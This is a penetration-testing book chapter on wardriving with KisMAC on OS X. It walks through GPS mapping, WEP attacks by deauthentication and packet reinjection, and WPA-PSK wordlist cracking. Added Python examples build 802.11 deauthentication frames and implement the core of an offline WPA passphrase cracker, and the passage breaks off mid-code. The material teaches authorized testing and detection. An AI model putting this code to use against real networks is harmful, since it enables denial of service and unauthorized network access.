WarDriving and Wireless Penetration Testing with OS X


Chapter 6

Solutions in this chapter:

■ WarDriving with KisMAC

■ Penetration Testing with OS X

■ Other OS X Tools for WarDriving and WLAN Testing

☑ Summary

☑ Solutions Fast Track

☑ Frequently Asked Questions

410_WD2e_06.qxd 10/16/06 10:08 AM Page 153


Introduction

With operating system (OS) X, WarDriving and Wireless Local Area Network (WLAN) penetration testing are well supported: the platform has excellent wireless support and several tools that make these tasks easy.

The first part of this chapter describes the steps necessary to configure and utilize the KisMAC WLAN discovery tool in order to successfully WarDrive. (For additional information regarding WarDriving, see Chapter 1.) The second part of this chapter describes how to use the information obtained during a WarDrive, and goes on to detail how a penetration tester can further utilize KisMAC to successfully penetrate a customer's wireless network.

WarDriving with KisMAC

KisMAC is the best WarDriving and WLAN discovery and penetration testing tool available on any platform, and is available for free at http://kismac.binaervarianz.de/. Most WarDriving applications provide the capability to discover networks in either active mode or passive mode; KisMAC provides both. On other platforms, WarDriving tools such as Kismet for Linux and NetStumbler for Windows only provide the capability to discover WLANs. KisMAC is unique because it also includes the functionality that a penetration tester needs to attack and compromise found networks.

Table 6.1 Prominent Wireless Discovery Tools and Capabilities

Tool          Platform   Scan Type        Attack Capability
NetStumbler   Windows    Active           No
Kismet        Linux      Passive          No
KisMAC        OS X       Active/Passive   Yes

Starting KisMAC and Initial Configuration

Once KisMAC has been downloaded and installed, it is relatively easy to use. The first thing you need to do is load KisMAC, which is done by clicking on the KisMAC icon (see Figure 6.1). (Habitual WarDrivers will want to add KisMAC to their Dock.)

www.syngress.com

154 Chapter 6 • WarDriving and Wireless Penetration Testing with OS X


Figure 6.1 KisMAC

Next, you need to configure your KisMAC preferences and understand the KisMAC interface.

Configuring the KisMAC Preferences

The KisMAC interface is very straightforward; however, because it is so robust, there are many different configuration options available. The first thing you need to do is open the "Preferences" window from the KisMAC menu by pressing KisMAC | Preferences (see Figure 6.2). This section covers six of the eight available preferences:

■ Scanning

■ Filter

■ Sounds

■ Driver

■ Traffic

■ KisMAC


Figure 6.2 KisMAC Preferences

Scanning Options

There are two scanning options available that relate to the actions KisMAC takes when closing:

■ Do not ask to save data on exit

■ Terminate KisMAC on close of main window

By default, you will be prompted to save your data file when closing KisMAC unless you check the "Do not ask to save data on exit" option. It is a good idea to leave this option unchecked, so that you are required to save your data manually before closing KisMAC and do not accidentally lose it. The second option controls whether or not KisMAC terminates when you close the main window, which is a matter of personal preference. If this box is unchecked, closing the main window leaves KisMAC running; it remains loaded and continues to show in the Dock.

Filter Options

The Filter options allow you to designate specific MAC addresses that you do not want included in your results (see Figure 6.3). Enter a MAC address and press add to enable this functionality. This is especially useful for removing known wireless networks (e.g., your home network or other boxes you are using for an attack) from your results. Additionally, if performing a penetration test, you will probably only want traffic from your target in your data sets; keeping out-of-scope networks out of your captures is also good practice, since the customer has not authorized you to collect their neighbors' traffic.


Figure 6.3 Filter Options

Sound Preferences

Unlike its Linux counterpart, Kismet, which requires a third-party speech application such as Festival, KisMAC has built-in functionality for speaking the Service Set Identifier (SSID) of wireless networks as they are found (see Figure 6.4).

Figure 6.4 KisMAC Sound Preferences


Easy-to-use drop-down menus (see Figure 6.5) allow you to assign different sound effects to be played when a Wired Equivalent Privacy (WEP) or WiFi Protected Access (WPA) network is found. Additionally, specific sound effects can be played when a certain number of packets have been captured, and different voices can speak the network name or SSID as networks are discovered.

Figure 6.5 Easy-to-Use Drop-Down Menus Allow You to Configure Sound Effects

Notes from the Underground

Choosing a WLAN Card

KisMAC has built-in support for a wide range of WLAN cards. When choosing a card you must determine what your goals are; KisMAC has support for both active and passive scanning. Active scanning uses the card's normal scan: it sends probe requests and relies on the access point answering (or beaconing) its SSID, so networks configured not to broadcast their SSID are missed. The built-in Airport Extreme card on most iBooks and Powerbooks works in active mode only.

Passive scanning does not rely on the broadcast beacon. In order to passively scan for wireless networks, you must have a card capable of entering monitor mode (rfmon). Once a card has been placed in monitor mode, it can sniff all traffic within range of that card (or its attached antenna) and discover any wireless networks, including those that do not broadcast their SSID in the beacon (the SSID can still be recovered from the probe and association frames of legitimate clients).

KisMAC supports Airport and Airport Extreme cards in active mode. For passive mode, KisMAC supports Personal Computer Memory Card International Association (PCMCIA) cards based on the Atheros, Prism2, Hermes (including the original Airport card), and Prism GT chipsets, as well as Cisco Aironet cards. Additionally, Universal Serial Bus (USB) devices based on the Prism2 chipset support passive mode. Figure 6.6 displays the drop-down menu of available chipsets. Table 6.2 indicates some of the common cards and chipsets that work with KisMAC and the mode they work in.

Table 6.2 Cards That Work with KisMAC

Manufacturer   Card                      Chipset    Mode
Apple          Airport                   Hermes     Passive
Apple          Airport Extreme           Broadcom   Active
Cisco          Aironet LMC-352           Cisco      Passive
Proxim         Orinoco Gold              Hermes     Passive
Engenius       Senao 2511CD Plus EXT2    Prism 2    Passive
Linksys        WPC11                     Prism 2    Passive
Linksys        WUSB54G                   Prism 2    Passive

NOTE

If your adapter is not listed in Table 6.2, go to http://linux-wlan.org/docs/wlan_adapters.html.tgz for a more complete list of cards and their respective chipsets.

12-in. Powerbooks and all iBook models do not have PCMCIA slots, and therefore require either an original (Hermes-based) Airport card or a USB WiFi adapter (e.g., Linksys WUSB54G) in order to work in passive mode. Unfortunately, there are currently no USB WiFi adapters with external antenna connectors.


Figure 6.6 KisMAC-supported Chipsets

Traffic

KisMAC also affords WarDrivers the ability to view the signal strength, number of packets transferred, and number of bytes transferred on detected networks. Networks can be displayed using the SSID or the MAC address of the access point, denoted in the "Options" panel (see Figure 6.7) as the Basic Service Set Identifier (BSSID). The average signal can be calculated based on the traffic seen in the last 1–300 seconds, and should be adjusted depending on the degree of accuracy needed.

Figure 6.7 Traffic Preferences

KisMAC Preferences

The KisMAC pane configures a built-in option that allows you to easily share your WarDrive data with other KisMAC users through the KisMAC server. In order to use it, you need a KisMAC account, which can be created from the KisMAC "Preferences" window.

Press the Sign up now. button to open the default browser (http://binaervarianz.de/register.php) and create your KisMAC account (see Figure 6.8). Figure 6.9 displays the KisMAC registration window.


Figure 6.8 The KisMAC Preferences

Figure 6.9 KisMAC Registration Window

To send your data to the KisMAC server when you have finished WarDriving, select the Export option from the File menu by pressing File | Export | Data to KisMAC Server.

In addition to transmitting your results to the KisMAC server, a KisMAC account allows you to search the existing KisMAC database.

NOTE

It is a good idea to disable the KisMAC server option (and make sure you do not export to it) prior to doing work for a customer, so that their network names, BSSIDs, and locations are not sent to a public server.


Mapping WarDrives with KisMAC

In general, KisMAC is a very intuitive and easy-to-use tool; however, there is one exception: mapping. Mapping WarDrives with KisMAC can be a frustrating experience at first. This section details the steps required to successfully import a map to use with KisMAC.

Importing a Map

The first step required in mapping WarDrives with KisMAC is importing a map. This differs from many other WLAN discovery applications (e.g., Kismet for Linux or NetStumbler for Windows) where maps are often generated at the completion of the WarDrive.

KisMAC requires the latitude and longitude of the center area of your drive in order to import a map. These coordinates can be input manually, but it is easier to connect your GPS first and get a signal lock.

Using a GPS

Most GPS devices capable of National Marine Electronics Association (NMEA) output work with KisMAC. Many of these devices are only available with serial cables. In most cases, you will need to purchase a serial-to-USB adapter (approximately $25) in order to connect your GPS to your Mac. Most of these adapters come with drivers for OS X; make sure that the one you purchase includes these drivers. Also, depending on your GPS model, you may be able to use a USB GPS cable and eliminate the need for a serial-to-USB adapter. The GPS Store sells these cables at http://www.thegpsstore.com/detail.asp?product_id=GL0997.

KisMAC can read the GPS either directly from the serial device or through GPSd, which listens on localhost port 2947. To install GPSd, download GPSd for OS X from http://gpsd.berlios.de/. Instructions for compiling and using GPSd can be found at http://kismac.binaervarianz.de/wiki/wiki.php/KisMAC/WiFiHacksCompileGPSd.

After you have connected your GPS, open the KisMAC Preferences and select the GPS options (see Figure 6.10). Select /dev/tty.usbserial0 (the device created by the serial-to-USB adapter's driver) from the drop-down menu if it wasn't automatically selected.

Ensure that use GPS coordinates and use all points are selected and, if you are using GPSd, that it is listening on localhost port 2947. Your GPS is now configured and ready to go.


Figure 6.10 KisMAC GPS Preferences

Another option is using a Bluetooth GPS; however, according to the KisMAC Web site there is a problem with the Bluetooth stack in OS X, so you still have to use GPSd with these devices.
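For reference, this is what the GPS is actually sending KisMAC (or GPSd) over that serial line, and how the numbers KisMAC needs for the map center come out of it. The following is an added example written for this edition, not code from KisMAC or GPSd: it validates the NMEA checksum, skips sentences from a receiver that has no fix yet, and converts the GGA position into decimal degrees. The sample sentences are constructed (the second is the commonly quoted textbook GGA line); the cold-start and corrupted lines are there because those are the two failure modes a WarDriver actually hits when the "automatically imported" coordinates come out wrong.

```python
"""Parse NMEA GGA sentences from a serial GPS into the decimal lat/lon KisMAC
wants as a map center.

Added example; not code from KisMAC or GPSd. The sentences in SAMPLE_NMEA are
constructed for the demonstration.
"""
from dataclasses import dataclass
from typing import Iterable, Optional


def nmea_checksum(body: str) -> str:
    """XOR of every character between '$' and '*', as two upper-case hex digits."""
    cs = 0
    for ch in body.encode("ascii"):
        cs ^= ch
    return f"{cs:02X}"


def _sentence(body: str) -> str:
    """Wrap a sentence body with the '$' prefix and a valid checksum (used to build samples)."""
    return f"${body}*{nmea_checksum(body)}"


def _dm_to_decimal(value: str, hemisphere: str) -> float:
    """NMEA packs degrees and decimal minutes together: ddmm.mmmm (lat), dddmm.mmmm (lon)."""
    raw = float(value)
    degrees = int(raw // 100)
    decimal = degrees + (raw - degrees * 100) / 60.0
    return -decimal if hemisphere in ("S", "W") else decimal


@dataclass(frozen=True)
class Fix:
    lat: float
    lon: float
    quality: int      # 0 = no fix, 1 = GPS, 2 = DGPS
    satellites: int


def parse_gga(line: str) -> Optional[Fix]:
    """Return a Fix for a valid GGA sentence that carries a position fix, else None."""
    line = line.strip()
    if not line.startswith("$") or "*" not in line:
        return None
    body, _, given = line[1:].partition("*")
    if given[:2].upper() != nmea_checksum(body):     # corrupted serial data: discard
        return None
    f = body.split(",")
    if f[0][2:] != "GGA" or len(f) < 8:              # GPGGA, GNGGA, ...; other sentences ignored
        return None
    quality = int(f[6] or 0)
    if quality == 0 or not f[2] or not f[4]:          # receiver has no lock yet
        return None
    return Fix(_dm_to_decimal(f[2], f[3]), _dm_to_decimal(f[4], f[5]),
               quality, int(f[7] or 0))


def first_fix(lines: Iterable[str]) -> Optional[Fix]:
    """The first usable position in a stream, i.e. the map center to hand to KisMAC."""
    for line in lines:
        fix = parse_gga(line)
        if fix:
            return fix
    return None


SAMPLE_NMEA = [  # constructed stream
    _sentence("GPGGA,123517,,,,,0,00,,,M,,M,,"),                              # cold start: no fix yet
    "$GPGGA,123519,4807.038,N,01131.000,E,1,08,0.9,545.4,M,46.9,M,,*47",     # textbook GGA line
    "$GPGGA,123519,4817.038,N,01131.000,E,1,08,0.9,545.4,M,46.9,M,,*47",     # one digit flipped: checksum fails
    _sentence("GPRMC,123519,A,4807.038,N,01131.000,E,022.4,084.4,230394,003.1,W"),  # not GGA; ignored
]

if __name__ == "__main__":
    fix = first_fix(SAMPLE_NMEA)
    print(f"map center: {fix.lat:.5f}, {fix.lon:.5f} "
          f"(quality {fix.quality}, {fix.satellites} satellites)")
```

The checksum test matters more than it looks: a serial-to-USB adapter with the wrong line settings produces sentences that are mostly readable but occasionally garbled, and a garbled latitude imported silently is how a map ends up centered on the wrong continent.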

Ready to Import

Now that your GPS device is connected, you are ready to import a map. To import a map, select File | Import | Map from | Server (see Figure 6.11).

Figure 6.11 Preparing to Import a Map

This opens the "Download Map" dialog box (see Figure 6.12). Your current GPS coordinates are automatically imported into this box. Choose the server and type of map you want to import.


Figure 6.12 Choosing the Map Server and Type of Map

There are several map servers available as well as different types of maps (i.e., regular or satellite), as shown in Figure 6.13.

Figure 6.13 Available Map Servers and Types of Maps

After importing your map, save it by pressing File | Save Map so that if KisMAC crashes during your WarDrive, you will have a local copy. KisMAC is an outstanding tool that is nonetheless prone to occasional crashes, which can happen when a large number of networks are found simultaneously. Additionally, many of the attacks included with KisMAC require significant memory and processor power. Even more unfortunate is that when KisMAC crashes, the system usually stops responding, thus requiring a complete shutdown and restart of the system to resume operations. Save your scan data regularly for the same reason.

Waypoint 1 is set to your current position. Before beginning your WarDrive, you need to set Waypoint 2. From the OS X menu bar press Map | Set Waypoint 2 and place the second waypoint at your destination, or at any other place on the map if you are unsure of your destination.


Next, set your "Map" preferences by pressing KisMAC | Preferences (see Figure 6.14). This is where you set the color scheme used on your map, the display quality, and the signal-strength levels that the colors denote.

Figure 6.14 KisMAC Map Preferences

After all of your options are set, you are ready to WarDrive. As access points are discovered they are plotted on the map. Pressing the Show Map button displays your map, and your access points are plotted in real time as you drive. A typical map generated by KisMAC using a satellite image is shown in Figure 6.15.

Figure 6.15 Typical KisMAC Satellite Map


KisMAC includes the ability to manipulate your map as well.

Notes from the Underground…

Disabling the Annoying "Sleep" Function

One of the more irritating features of OS X for WarDrivers is the inability to disable the "sleep" function that kicks in when the lid is closed. In many states, driving with your laptop open is illegal. A laptop that is asleep and not collecting access points poses a difficult problem for OS X WarDrivers. Luckily, a kernel extension is available that allows you to temporarily disable the OS X sleep function.

Insomnia (http://binaervarianz.de/projekte/programmieren/meltmac/) is a kernel extension used to disable sleep in OS X. After downloading Insomnia, unpack the kernel extension and issue the following command:

sudo chown -R root:wheel Insomnia.kext

This sets the ownership the kernel requires on the extension (kextload refuses to load an extension that is not owned by root:wheel). This step is required once, immediately after download and before using Insomnia. The kernel extension has to be loaded each time you want to disable the sleep function:

sudo kextload Insomnia.kext

Now when you close the lid on your Powerbook or iBook it will not go to sleep. When you are finished WarDriving and want to re-enable the "sleep" function, the kernel extension must be unloaded:

sudo kextunload Insomnia.kext

Your laptop is back to normal operation. It should be pointed out that Apple laptops generate a lot of heat, so it is not a good idea to leave this kernel extension loaded all the time; load it only on the specific occasions when you need it.

WarDriving with KisMAC

Now that your KisMAC preferences are set, the correct driver is chosen, and your map is imported, it is time to go WarDriving. The KisMAC interface is easy to navigate and has some advanced functionality that combines the best features from other WarDriving applications, including many commercial applications.


Using the KisMAC Interface

The KisMAC interface (see Figure 6.16) is straightforward and easy to understand. The main window displays all wireless networks that KisMAC has found, and can be sorted by number (in the order it was found); SSID; BSSID (MAC address); the type of encryption used; the current, average, or maximum signal strength; the number of packets transmitted; the size of the data stream (in kilobytes or megabytes); and the time that the access point was last in range (Last Seen).

Figure 6.16 KisMAC Graphical User Interface

After you have configured the options for your WarDrive, press the Start Scan button (located in the bottom right corner of the interface) to begin locating access points. Additionally, there are four buttons across the bottom toolbar that allow you to see specific information about your current drive.

The KisMAC Window View Buttons

KisMAC allows you to see specific information about your current WarDrive by selecting one of four buttons that are located on the bottom toolbar (see Figure 6.17).

The Show Networks button is the default setting. To return to the default setting after selecting other options, press this button to see all of the networks that have been discovered.


Figure 6.17 KisMAC Window View Buttons


Selecting the Show Traffic button brings up a signal graph of the networks that were discovered during your WarDrive. By default, this view shows a signal strength graph (see Figure 6.18). Each access point is denoted by a unique color, and a key showing which network is assigned to each color is in the upper right-hand corner. The taller lines in the graph indicate a stronger signal.

Figure 6.18 “Show Traffic” View

There are two drop-down menus in the upper left-hand corner. One sets the interval (15 seconds by default) that is displayed, and the other changes the type of information shown in the "Show Traffic" view. In addition to the signal strength, you can also display the packets per second that are traversing the wireless network, or the total number of bytes that have been sent and received by the access points.


The Show Map button allows you to view a live map of your current WarDrive. (For more information on mapping your WarDrive, see "Mapping WarDrives with KisMAC" earlier in this chapter.)

The last view is accessed with the Show Details button. This view allows you to obtain a significant amount of information about a specific access point (see Figure 6.19).

Figure 6.19 “Show Details” View

The information listed in the default view is on the left side of the interface, and the information about clients that are attached to the network is on the right-hand side of the interface. The information available in this view is essential to a penetration tester, and is discussed in detail in the "Penetration Testing with OS X" section later in this chapter.

Additional View Options with KisMAC

In addition to the View buttons, KisMAC provides you with the ability to obtain additional information about specific networks while in "Show Networks" view. Using the OS X menu bar, press Windows | Show Hierarchy (see Figure 6.20).

With "Show Hierarchy" displayed (see Figure 6.21), you can gather more information about specific networks: networks utilizing different types of encryption, or all networks transmitting on a specific channel. This information is vital during a penetration test.


Figure 6.20 OS X Menu Hierarchy

Figure 6.21 “KisMAC Hierarchy” View

Penetration Testing with OS X

In addition to being used as a WarDriving application, KisMAC is the best tool available for wireless network penetration testing. KisMAC has built-in functionality to perform many of the most common WLAN attacks, using an easy "point-and-click" interface. Additionally, KisMAC can import packet capture dumps from other programs to perform many offline attacks against wireless networks. This section walks through many of these attacks on the target network.


The following is a working example: You're contracted to perform a penetration test for a company and need to correctly identify their wireless network. Using the information gathered during your WarDrive of the area surrounding your target, you successfully identified the target network based on the signal strength, map data, and naming convention used on the access point. To successfully penetrate this network, you have to determine what type of encryption is being used.

Attacking WLAN Encryption with KisMAC

There are several different types of encryption that wireless networks can employ. The most commonly used encryption schemes are WEP and WPA, although there are other, more advanced schemes available. Looking at the KisMAC display, you see that the access point with the SSID Our_Target is a WEP-encrypted network.

Attacking WEP with KisMAC

Since you have determined that WEP is being used on your target wireless network, you now have to decide how you want to crack the key. KisMAC has three primary methods of WEP cracking built in:

■ Wordlist attacks

■ Weak scheduling attacks

■ Bruteforce attacks

To use one of these attacks, you have to capture enough initialization vectors (IVs) for the attack to work. The easiest way to do this is by reinjecting traffic, which is usually accomplished by capturing an Address Resolution Protocol (ARP) packet, spoofing the sender, and sending it back to the access point. Each replay makes the access point answer with a freshly encrypted frame, and therefore a new IV, so this generates a large amount of traffic that can then be captured and decoded. An ARP request is recognizable even though it is encrypted, because it has a fixed size and a broadcast destination. Unfortunately, you can't always capture an ARP packet under normal circumstances; however, when a client authenticates to the access point, an ARP packet is usually generated. Because of this, if you can deauthenticate the clients that are on the network and cause them to reassociate, you may get your ARP packet.

Looking at the detailed view of Our_Target, you can see that there are several clients connected to it. Before continuing with the attack, you need to determine the role that KisMAC will play. Two hosts are required to successfully crack the WEP key: one host is used to inject traffic, and the other host is used to capture the traffic (specifically the IVs). In this case, you will use KisMAC to inject and will have a second host to capture the traffic. While KisMAC and OS X are very powerful attack tools, the actual cracking is often best performed on a Linux host utilizing tools such as Aircrack (www.cr0.net:8040/code/network), because KisMAC does not include support for many of the newer WEP attacks, such as chopping (chopchop). Hopefully, these attacks will be included with future releases of KisMAC.

Deauthenticating clients with KisMAC is simple; however, before you can begin deauthenticating, you must lock KisMAC to the specific channel that your target network is using. From the top menu press KisMAC | Preferences | Driver Preferences. Highlight the driver you are using and deselect all channels other than the one that the target is using. Also, ensure that use as primary device is checked under the "Injection" menu. Close the "Preferences," highlight the access point you want to deauthenticate clients from, and press Network | Deauthenticate. If KisMAC is successful in its attempt to deauthenticate, the dialog changes to note the BSSID of the access point it is deauthenticating (see Figure 6.22). During the time the deauthentication is occurring, clients cannot use the wireless network, so agree the timing with the customer beforehand and keep the bursts short.

Figure 6.22 Deauthentication

During deauthentication, the number of Inj. Packets should increase (see Figure 6.22). After several of these have been captured, stop the deauthentication.
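The deauthentication attack works because, in the 802.11 of this chapter's era, management frames carry no authentication: anyone who can transmit on the channel can send a deauthentication frame with the access point's address as the source, and every client honours it (802.11w management frame protection, which adds a MIC to these frames, was standardized later). The following added example, not KisMAC's code, builds the frame an injector is effectively sending and then shows the flip side, the check a wireless intrusion detection system runs to notice the attack: a burst of reason-code-7 deauthentications from one BSSID in a short window. The MAC addresses and timestamps are constructed for the demonstration.

```python
"""802.11 deauthentication: the frame an injector sends and how a monitor spots a flood.

Added example, not KisMAC's code. Frame layout follows the IEEE 802.11 MAC header;
all MAC addresses and timestamps below are constructed for the demonstration.
"""
import struct
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"
TARGET_BSSID = "00:0f:66:aa:bb:cc"   # constructed: Our_Target's access point
CLIENT = "00:11:24:dd:ee:ff"         # constructed: one associated client
OTHER_BSSID = "00:0c:41:12:34:56"    # constructed: a neighbouring network
GATEWAY = "00:50:56:00:00:01"        # constructed: wired host the client talks to


def mac_bytes(s: str) -> bytes:
    return bytes.fromhex(s.replace(":", ""))


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def build_deauth(dst: str, src: str, bssid: str, reason: int = 7, seq: int = 0) -> bytes:
    """Management frame (type 0), subtype 12 = deauthentication.

    Frame control is little-endian; byte 0 = subtype << 4 | type << 2 | version,
    so a deauthentication frame starts 0xC0 0x00. Reason 7 ("class 3 frame received
    from nonassociated station") is what injection tools usually send.
    """
    frame_control = (12 << 4) | (0 << 2) | 0
    header = (struct.pack("<HH", frame_control, 0)            # frame control, duration
              + mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid)
              + struct.pack("<H", (seq & 0x0FFF) << 4))       # sequence control
    return header + struct.pack("<H", reason)


def build_data(dst: str, src: str, bssid: str, payload: bytes = b"\x00" * 32) -> bytes:
    """Ordinary data frame from a client to its AP (ToDS=1, so addr1 is the BSSID)."""
    frame_control = 0x0108                                     # type 2 (data), flags: ToDS
    header = (struct.pack("<HH", frame_control, 0)
              + mac_bytes(bssid) + mac_bytes(src) + mac_bytes(dst)
              + struct.pack("<H", 0))
    return header + payload


def parse_frame(frame: bytes):
    """Minimal 802.11 header parse; adds the reason code for deauth/disassoc frames."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
    info = {
        "type": ftype, "subtype": subtype,
        "addr1": mac_str(frame[4:10]), "addr2": mac_str(frame[10:16]),
        "addr3": mac_str(frame[16:22]),             # BSSID for management frames
    }
    if ftype == 0 and subtype in (10, 12) and len(frame) >= 26:
        info["reason"] = struct.unpack_from("<H", frame, 24)[0]
    return info


def deauth_floods(captured, threshold: int = 10, window: float = 1.0) -> dict:
    """Detection side. `captured` is a list of (timestamp_seconds, frame_bytes).

    A BSSID is flagged when at least `threshold` deauthentication/disassociation
    frames fall inside any `window` seconds. Returns {bssid: peak_count_in_window}.
    One deauthentication is normal (a station leaving); dozens a second are not.
    """
    times = defaultdict(list)
    for ts, frame in captured:
        parsed = parse_frame(frame)
        if parsed and "reason" in parsed:
            times[parsed["addr3"]].append(ts)
    flagged = {}
    for bssid, stamps in times.items():
        stamps.sort()
        start, peak = 0, 0
        for end, t in enumerate(stamps):
            while t - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[bssid] = peak
    return flagged


def constructed_capture():
    """What a monitor-mode card would see: normal traffic, then an injector's burst."""
    frames = [(0.2 * i, build_data(GATEWAY, CLIENT, TARGET_BSSID)) for i in range(5)]
    frames += [(1.0 + i / 128, build_deauth(BROADCAST, TARGET_BSSID, TARGET_BSSID, seq=i))
               for i in range(64)]                             # 64 deauths in half a second
    frames.append((1.3, build_deauth(CLIENT, OTHER_BSSID, OTHER_BSSID, reason=3)))  # legitimate: STA leaving
    return frames


if __name__ == "__main__":
    for bssid, count in deauth_floods(constructed_capture()).items():
        print(f"deauth flood against {bssid}: {count} frames within 1 s")
```

The detection threshold is deliberately per-BSSID and time-windowed: a single deauthentication with reason 3 is what a station sends when it shuts down, and alerting on it would bury the real event. What a customer's WIDS will log during your test is exactly the burst above, so expect it to show up in their records.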


Reinjection

Once several potentially reinjectable packets have been captured (noted in the "Show Details" view of KisMAC), it is time to attempt reinjection. Press Network | Reinject Packets (see Figure 6.23).

Figure 6.23 Preparing to Reinject Packets

This opens a dialog box (see Figure 6.24) indicating that KisMAC is testing each packet to determine if it can be successfully reinjected into the network.

Figure 6.24 Testing the Packets

Once KisMAC finds a suitable packet, the dialog box closes and KisMAC begins injection. This can be verified by viewing the "Network" options (see Figure 6.25).

Now the traffic has to be captured with a second card (usually on a second machine) in order to capture enough IVs to attempt to crack the key. KisMAC can be used to perform weak scheduling attacks after enough weak IVs have been captured; however, it is probably more efficient to use KisMAC to inject packets, and to use a tool such as Aircrack to perform the actual WEP crack.


Figure 6.25 Reinjection

Attacking WPA with KisMAC

Unlike WEP, which requires that a large amount of traffic be generated in order to crack the key, cracking WPA only requires that you capture the four-way Extensible Authentication Protocol Over Local Area Network (EAPOL) handshake at authentication (in practice, the first two messages, which carry the two nonces and the client's message integrity code, are enough). Also, unlike cracking WEP, the WPA attack is an offline dictionary attack, which means that when you use KisMAC to crack a WPA pre-shared key (or passphrase), you only need to capture a small amount of traffic; the actual attack can be carried out later, even when you are out of range of the access point.

WPA-PSK is only vulnerable when the passphrase is guessable: it must be a dictionary word or otherwise in your wordlist, and short passphrases are the ones most likely to be. Because the key is derived from the passphrase and the SSID together, precomputed tables only help against one specific SSID. An extensive wordlist with many combinations of letters, numbers, and special characters can help increase the odds of successfully cracking WPA.

To attempt a dictionary attack against WPA with KisMAC, you may need to deauthenticate clients (detailed in the "Attacking WEP with KisMAC" section). Unlike the WEP attack, however, everything can be done from one host: deauthentication causes the client to disassociate from the network and forces it to reconnect, which requires the four-way EAPOL handshake to be transmitted again, and KisMAC captures it.

Once you have captured an association between a client and the WPA network, press Network | Crack | Wordlist Attack | Wordlist against WPA-PSK Key. You will be prompted for the location of the wordlist or dictionary file that you want to use. After you have selected your dictionary file, KisMAC begins testing each word in that file against the WPA Pre-Shared Key (PSK) (see Figure 6.26).

When KisMAC has successfully determined the key, it is displayed in the "Show Details" view.


Figure 6.26 WPA Cracking
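What KisMAC is doing for each word in that file is worth seeing in the open, since it explains both why one captured handshake is enough and why the attack is slow. The following added example (not KisMAC's code) derives the pairwise master key from the passphrase and SSID with PBKDF2, expands it to the key confirmation key with the 802.11i PRF, and checks the message integrity code on EAPOL message 2, which is the computation a dictionary attack repeats for every guess. The access point and client addresses, the nonces and the wordlist are constructed; the handshake is generated from a known passphrase so the whole thing runs offline, and the PBKDF2 step is checked against the published IEEE 802.11i test vector ("password" with SSID "IEEE").

```python
"""WPA-PSK offline dictionary attack, reduced to its cryptographic core.

Added example, not KisMAC's code. Addresses, nonces and wordlist are constructed;
the EAPOL-Key message 2 layout follows IEEE 802.11i (RSN key descriptor, CCMP).
"""
import hashlib
import hmac
import struct

SSID = "Our_Target"                              # the chapter's target network
AP_MAC = bytes.fromhex("000f66aabbcc")           # constructed BSSID (AA)
STA_MAC = bytes.fromhex("001124ddeeff")          # constructed client address (SPA)
ANONCE = bytes(range(0, 32))                     # constructed; real nonces are random
SNONCE = bytes(range(32, 64))
MIC_OFFSET = 81   # EAPOL hdr 4 + desc 1 + key info 2 + key len 2 + replay 8 + nonce 32 + IV 16 + RSC 8 + ID 8
WORDLIST = ["password", "letmein", "qwerty123", "Our_Target1", "sunshine"]   # constructed


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).

    The SSID is the salt, so a precomputed table only helps against that one SSID,
    and the 4096 iterations are why every guess costs as much as it does.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, truncated."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def kck_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(nonces)||max(nonces)).
    Its first 16 bytes are the KCK, which keys the EAPOL MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, eapol: bytes, descriptor_version: int) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed:
    HMAC-MD5 for descriptor version 1 (TKIP), HMAC-SHA1 truncated to 128 bits for version 2 (CCMP)."""
    blank = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    if descriptor_version == 1:
        return hmac.new(kck, blank, hashlib.md5).digest()
    return hmac.new(kck, blank, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """EAPOL-Key message 2 of 4 (client -> AP): carries the SNonce and the client's MIC."""
    key_info = 0x010A                                   # descriptor version 2 (CCMP), pairwise, MIC set
    body = (struct.pack(">BHH", 2, key_info, 16)        # RSN descriptor type, key info, key length
            + b"\x00" * 8                               # replay counter
            + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # key IV, RSC, key ID
            + mic
            + struct.pack(">H", 0))                     # key data length (RSN IE omitted here)
    return struct.pack(">BBH", 1, 3, len(body)) + body  # 802.1X version 1, type 3 = EAPOL-Key


def capture_handshake(passphrase: str) -> bytes:
    """Stand-in for the sniffed handshake: message 2 with a MIC computed from the real passphrase."""
    kck = kck_from_pmk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return build_msg2(SNONCE, eapol_mic(kck, build_msg2(SNONCE), 2))


def crack_psk(eapol_msg2: bytes, wordlist, ssid: str = SSID,
              aa: bytes = AP_MAC, spa: bytes = STA_MAC, anonce: bytes = ANONCE):
    """Offline attack: recompute the MIC for every candidate passphrase; no AP contact needed.
    The ANonce comes from message 1 of the same handshake; everything else is in message 2."""
    descriptor_version = struct.unpack_from(">H", eapol_msg2, 5)[0] & 0x7
    snonce = eapol_msg2[17:49]
    captured_mic = eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for word in wordlist:
        kck = kck_from_pmk(pmk_from_passphrase(word, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, eapol_msg2, descriptor_version), captured_mic):
            return word
    return None


if __name__ == "__main__":
    captured = capture_handshake("sunshine")          # the network's real PSK: 8 characters, in the list
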